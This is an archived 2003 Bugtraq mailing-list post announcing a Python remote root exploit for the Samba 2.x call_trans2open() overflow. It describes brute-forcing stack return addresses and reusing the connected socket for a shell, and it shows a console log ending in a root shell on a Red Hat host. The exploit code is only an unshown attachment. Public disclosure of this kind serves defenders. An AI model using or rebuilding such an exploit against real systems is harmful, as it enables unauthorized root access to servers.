[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.33.0304080328300.839-101000@juneof44.hoover>
Date: Tue, 8 Apr 2003 04:01:00 -0700 (PDT)
From: noir sin <noir@...mpos.org>
To: <bugtraq@...urityfocus.com>
Subject: samba 2.x call_trans2open() exploit
0day is fragile! one day it's your precious, next day its worthless ...
anyways i put together this SAMBAExploit class in python which might be
interesting for folks since it's reusable in many other stuff ...
python cause; write once a heap, stack or fmt string exploit class and the
rest is just to "cp old_exp.py new_exp.py; vi new_exp.py"
exploit bruteforces all possible stack range and dups the already
connected socket for spawning the shell
greets to: Michael Teo for pysmb, lsd-pl for linux/findsck shellcode
- noir
noir@...eof44:/tmp/samba_exp2 > python samba_exp.py 172.17.1.132
[*] brute forcing well known addr range ... [*]
trying; retaddr: 0xbffed404
trying; retaddr: 0xbffed504
trying; retaddr: 0xbffed604
trying; retaddr: 0xbffed704
Linux localhost 2.4.9-e.3 #1 Fri May 3 17:02:43 EDT 2002 i686 unknown
cat /etc/redhat-rel*
Red Hat Linux Advanced Server release 2.1AS (Pensacola)
id
uid=0(root) gid=0(root) groups=99(nobody)
exit
*** Connection closed by remote host ***
Download attachment "samba_exp2.tar.gz" of type "APPLICATION/X-GUNZIP" (15799 bytes)
Powered by blists - more mailing lists